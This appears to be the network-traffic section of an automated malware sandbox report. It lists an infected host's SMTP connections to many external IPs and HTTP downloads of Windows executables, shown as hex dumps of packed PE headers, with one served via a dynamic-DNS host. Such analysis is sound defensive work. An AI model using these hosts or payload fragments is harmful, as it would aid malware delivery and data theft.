                                                Source: global trafficTCP traffic: 192.168.2.11:50608 -> 77.68.93.69:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50609 -> 209.240.204.200:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50610 -> 44.214.199.220:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50615 -> 104.26.6.19:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50617 -> 34.111.176.156:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50626 -> 151.101.2.159:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50632 -> 80.88.84.73:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50645 -> 193.7.207.36:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50646 -> 176.57.65.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50649 -> 148.163.149.246:587
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:09:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 00:52:16 GMTETag: "71338-62fa1ead40d79"Accept-Ranges: bytesContent-Length: 463672Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1a 78 b8 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 59 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 b4 06 00 38 5f 00 00 00 e0 06 00 c4 45 00 00 28 e2 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 e3 05 00 18 00 00 00 60 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a f1 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 02:25:35 GMTETag: "1d2400-62fa3388ccd41"Accept-Ranges: bytesContent-Length: 1909760Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cc 41 c8 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 46 22 00 00 00 00 00 00 d0 6f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 6f 00 00 04 00 00 6c 8b 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2f 00 00 c0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 62 6c 6f 78 73 6d 6b 00 b0 1b 00 00 20 54 00 00 a6 1b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 63 6a 77 62 71 70 00 10 00 00 00 d0 6f 00 00 02 00 00 00 22 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 05 Mar 2025 21:50:28 GMTETag: "1a4600-62f9f60a51100"Accept-Ranges: bytesContent-Length: 1721856Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d3 a3 1d 93 97 c2 73 c0 97 c2 73 c0 97 c2 73 c0 19 dd 60 c0 cd c2 73 c0 6b e2 61 c0 96 c2 73 c0 52 69 63 68 97 c2 73 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 71 b8 bc 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 0c 00 22 00 00 00 12 00 00 00 00 00 00 00 d0 43 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 44 00 00 04 00 00 2a c1 1a 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 00 00 6a 00 00 00 00 60 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 00 00 00 10 00 00 00 18 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 60 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 75 78 66 73 63 64 77 00 f0 19 00 00 d0 29 00 00 f0 19 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 69 61 68 7a 67 6d 68 00 10 00 00 00 c0 43 00 00 06 00 00 00 1e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 43 00 00 22 00 00 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 02:28:07 GMTETag: "1d2400-62fa341994b91"Accept-Ranges: bytesContent-Length: 1909760Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cc 41 c8 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 46 22 00 00 00 00 00 00 d0 6f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 6f 00 00 04 00 00 6c 8b 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2f 00 00 c0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 62 6c 6f 78 73 6d 6b 00 b0 1b 00 00 20 54 00 00 a6 1b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 63 6a 77 62 71 70 00 10 00 00 00 d0 6f 00 00 02 00 00 00 22 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:26 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "10e436-6288a2718791b"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:38 GMTETag: "eaa00-62fa693135966"Accept-Ranges: bytesContent-Length: 961024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c0 3f c9 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 ee 00 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 44 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 